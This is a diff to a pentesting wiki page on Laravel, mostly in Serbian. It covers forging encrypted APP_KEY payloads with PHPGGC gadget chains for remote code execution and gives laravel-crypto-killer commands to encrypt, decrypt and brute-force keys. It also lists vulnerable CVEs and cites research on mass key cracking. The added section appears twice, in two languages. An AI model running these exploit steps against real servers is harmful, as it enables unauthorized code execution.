diff --git a/src/network-services-pentesting/pentesting-web/laravel.md b/src/network-services-pentesting/pentesting-web/laravel.md index a54c3f4c4..4ddebc8fe 100644 --- a/src/network-services-pentesting/pentesting-web/laravel.md +++ b/src/network-services-pentesting/pentesting-web/laravel.md @@ -1,22 +1,107 @@ # Laravel +{{#include /banners/hacktricks-training.md}} + +### Laravel SQLInjection + +Pročitajte informacije o tome ovde: [https://stitcher.io/blog/unsafe-sql-functions-in-laravel](https://stitcher.io/blog/unsafe-sql-functions-in-laravel) + +--- + +## APP_KEY & Encryption internals (Laravel \u003e=5.6) + +Laravel koristi AES-256-CBC (ili GCM) sa HMAC integritetom u pozadini (`Illuminate\\Encryption\\Encrypter`). +Sirovi šifrovani tekst koji se konačno **šalje klijentu** je **Base64 JSON objekat** poput: +```json +{ +"iv" : "Base64(random 16-byte IV)", +"value": "Base64(ciphertext)", +"mac" : "HMAC_SHA256(iv||value, APP_KEY)", +"tag" : "" // only used for AEAD ciphers (GCM) +} +``` +`encrypt($value, $serialize=true)` će po defaultu `serialize()` plaintext, dok će `decrypt($payload, $unserialize=true)` **automatski `unserialize()`** dekriptovanu vrednost. Stoga **bilo koji napadač koji zna 32-bajtni tajni `APP_KEY` može napraviti enkriptovani PHP serijalizovani objekat i dobiti RCE putem magičnih metoda (`__wakeup`, `__destruct`, …)**. + +Minimal PoC (framework ≥9.x): +```php +use Illuminate\Support\Facades\Crypt; + +$chain = base64_decode(''); // e.g. phpggc Laravel/RCE13 system id -b -f +$evil = Crypt::encrypt($chain); // JSON->Base64 cipher ready to paste +``` +Ubaci proizvedeni string u bilo koji ranjivi `decrypt()` sink (parametar rute, kolačić, sesija, …). + +--- + +## laravel-crypto-killer 🧨 +[laravel-crypto-killer](https://github.com/synacktiv/laravel-crypto-killer) automatizuje ceo proces i dodaje praktičan **bruteforce** režim: +```bash +# Encrypt a phpggc chain with a known APP_KEY +laravel_crypto_killer.py encrypt -k "base64:" -v "$(phpggc Laravel/RCE13 system id -b -f)" + +# Decrypt a captured cookie / token +laravel_crypto_killer.py decrypt -k -v + +# Try a word-list of keys against a token (offline) +laravel_crypto_killer.py bruteforce -v -kf appkeys.txt +``` +The script transparentno podržava i CBC i GCM payload-e i ponovo generiše HMAC/tag polje. + +--- + +## Uzorci ranjivosti iz stvarnog sveta + +| Projekat | Ranjivi sink | Gadget lanac | +|----------|--------------|--------------| +| Invoice Ninja ≤v5 (CVE-2024-55555) | `/route/{hash}` → `decrypt($hash)` | Laravel/RCE13 | +| Snipe-IT ≤v6 (CVE-2024-48987) | `XSRF-TOKEN` kolačić kada je `Passport::withCookieSerialization()` omogućen | Laravel/RCE9 | +| Crater (CVE-2024-55556) | `SESSION_DRIVER=cookie` → `laravel_session` kolačić | Laravel/RCE15 | + +Tok eksploatacije je uvek: +1. Dobiti `APP_KEY` (podrazumevani primeri, Git leak, config/.env leak, ili brute-force) +2. Generisati gadget sa **PHPGGC** +3. `laravel_crypto_killer.py encrypt …` +4. Dostaviti payload kroz ranjivi parametar/kolačić → **RCE** + +--- + +## Masovno otkrivanje APP_KEY putem brute-force kolačića + +Pošto svaki sveži Laravel odgovor postavlja bar 1 enkriptovani kolačić (`XSRF-TOKEN` i obično `laravel_session`), **javne internet skeneri (Shodan, Censys, …) otkrivaju milione ciphertext-a** koji se mogu napasti offline. + +Ključni nalazi istraživanja objavljenog od strane Synacktiv (2024-2025): +* Dataset jul 2024 » 580 k tokena, **3.99 % ključeva je probijeno** (≈23 k) +* Dataset maj 2025 » 625 k tokena, **3.56 % ključeva je probijeno** +* >1 000 servera još uvek ranjivo na legacy CVE-2018-15133 jer tokeni direktno sadrže serijalizovane podatke. +* Ogromna ponovna upotreba ključeva – Top-10 APP_KEY-ova su hard-kodirani podrazumevani ključevi isporučeni sa komercijalnim Laravel šablonima (UltimatePOS, Invoice Ninja, XPanel, …). + +Privatni Go alat **nounours** povećava AES-CBC/GCM bruteforce propusnost na ~1.5 milijardi pokušaja/s, smanjujući vreme potrebno za probijanje celog skupa podataka na <2 minuta. + +--- + +## Reference +* [Laravel: APP_KEY leakage analysis](https://www.synacktiv.com/publications/laravel-appkey-leakage-analysis.html) +* [laravel-crypto-killer](https://github.com/synacktiv/laravel-crypto-killer) +* [PHPGGC – PHP Generic Gadget Chains](https://github.com/ambionics/phpggc) +* [CVE-2018-15133 write-up (WithSecure)](https://labs.withsecure.com/archive/laravel-cookie-forgery-decryption-and-rce) + {{#include ../../banners/hacktricks-training.md}} -## Laravel Tricks +## Laravel trikovi ### Debugging mode -Ako je Laravel u **debugging mode**, moći ćete da pristupite **kod** i **osetljivim podacima**.\ +Ako je Laravel u **debugging mode** moći ćete da pristupite **kod** i **osetljivim podacima**.\ Na primer `http://127.0.0.1:8000/profiles`: ![](<../../images/image (1046).png>) -To je obično potrebno za eksploataciju drugih Laravel RCE CVE-ova. +Ovo je obično potrebno za eksploataciju drugih Laravel RCE CVE-a. ### .env -Laravel čuva APP koji koristi za enkripciju kolačića i drugih akreditiva unutar datoteke pod nazivom `.env` koja se može pristupiti koristeći neku putanju za prolazak ispod: `/../.env` +Laravel čuva APP koji koristi za enkripciju kolačića i drugih akreditiva unutar datoteke pod nazivom `.env` koja se može pristupiti koristeći neku putanju za prolaz ispod: `/../.env` Laravel će takođe prikazati ove informacije unutar debug stranice (koja se pojavljuje kada Laravel pronađe grešku i aktivira se). @@ -99,4 +184,87 @@ Još jedna deserializacija: [https://github.com/ambionics/laravel-exploits](http Pročitajte informacije o ovome ovde: [https://stitcher.io/blog/unsafe-sql-functions-in-laravel](https://stitcher.io/blog/unsafe-sql-functions-in-laravel) +### Laravel SQLInjection + +Pročitajte informacije o ovome ovde: [https://stitcher.io/blog/unsafe-sql-functions-in-laravel](https://stitcher.io/blog/unsafe-sql-functions-in-laravel) + +--- + +## APP_KEY & Encryption internals (Laravel \u003e=5.6) + +Laravel koristi AES-256-CBC (ili GCM) sa HMAC integritetom u pozadini (`Illuminate\\Encryption\\Encrypter`). +Sirovi ciphertext koji se konačno **šalje klijentu** je **Base64 JSON objekat** poput: +```json +{ +"iv" : "Base64(random 16-byte IV)", +"value": "Base64(ciphertext)", +"mac" : "HMAC_SHA256(iv||value, APP_KEY)", +"tag" : "" // only used for AEAD ciphers (GCM) +} +``` +`encrypt($value, $serialize=true)` će po defaultu `serialize()` plaintext, dok će `decrypt($payload, $unserialize=true)` **automatski `unserialize()`** dekriptovanu vrednost. Stoga **bilo koji napadač koji zna 32-bajtni tajni `APP_KEY` može napraviti enkriptovani PHP serijalizovani objekat i dobiti RCE putem magičnih metoda (`__wakeup`, `__destruct`, …)**. + +Minimal PoC (framework ≥9.x): +```php +use Illuminate\Support\Facades\Crypt; + +$chain = base64_decode(''); // e.g. phpggc Laravel/RCE13 system id -b -f +$evil = Crypt::encrypt($chain); // JSON->Base64 cipher ready to paste +``` +Ubaci proizvedeni string u bilo koji ranjivi `decrypt()` sink (parametar rute, kolačić, sesija, …). + +--- + +## laravel-crypto-killer 🧨 +[laravel-crypto-killer](https://github.com/synacktiv/laravel-crypto-killer) automatizuje ceo proces i dodaje praktičan **bruteforce** režim: +```bash +# Encrypt a phpggc chain with a known APP_KEY +laravel_crypto_killer.py encrypt -k "base64:" -v "$(phpggc Laravel/RCE13 system id -b -f)" + +# Decrypt a captured cookie / token +laravel_crypto_killer.py decrypt -k -v + +# Try a word-list of keys against a token (offline) +laravel_crypto_killer.py bruteforce -v -kf appkeys.txt +``` +The script transparently supports both CBC and GCM payloads and re-generates the HMAC/tag field. + +--- + +## Real-world vulnerable patterns + +| Project | Vulnerable sink | Gadget chain | +|---------|-----------------|--------------| +| Invoice Ninja ≤v5 (CVE-2024-55555) | `/route/{hash}` → `decrypt($hash)` | Laravel/RCE13 | +| Snipe-IT ≤v6 (CVE-2024-48987) | `XSRF-TOKEN` cookie when `Passport::withCookieSerialization()` is enabled | Laravel/RCE9 | +| Crater (CVE-2024-55556) | `SESSION_DRIVER=cookie` → `laravel_session` cookie | Laravel/RCE15 | + +The exploitation workflow is always: +1. Obtain `APP_KEY` (default examples, Git leak, config/.env leak, or brute-force) +2. Generate gadget with **PHPGGC** +3. `laravel_crypto_killer.py encrypt …` +4. Deliver payload through the vulnerable parameter/cookie → **RCE** + +--- + +## Mass APP_KEY discovery via cookie brute-force + +Because every fresh Laravel response sets at least 1 encrypted cookie (`XSRF-TOKEN` and usually `laravel_session`), **public internet scanners (Shodan, Censys, …) leak millions of ciphertexts** that can be attacked offline. + +Key findings of the research published by Synacktiv (2024-2025): +* Dataset July 2024 » 580 k tokens, **3.99 % keys cracked** (≈23 k) +* Dataset May 2025 » 625 k tokens, **3.56 % keys cracked** +* >1 000 servers still vulnerable to legacy CVE-2018-15133 because tokens directly contain serialized data. +* Huge key reuse – the Top-10 APP_KEYs are hard-coded defaults shipped with commercial Laravel templates (UltimatePOS, Invoice Ninja, XPanel, …). + +The private Go tool **nounours** pushes AES-CBC/GCM bruteforce throughput to ~1.5 billion tries/s, reducing full dataset cracking to <2 minutes. + +--- + +## References +* [Laravel: APP_KEY leakage analysis](https://www.synacktiv.com/publications/laravel-appkey-leakage-analysis.html) +* [laravel-crypto-killer](https://github.com/synacktiv/laravel-crypto-killer) +* [PHPGGC – PHP Generic Gadget Chains](https://github.com/ambionics/phpggc) +* [CVE-2018-15133 write-up (WithSecure)](https://labs.withsecure.com/archive/laravel-cookie-forgery-decryption-and-rce) + {{#include ../../banners/hacktricks-training.md}}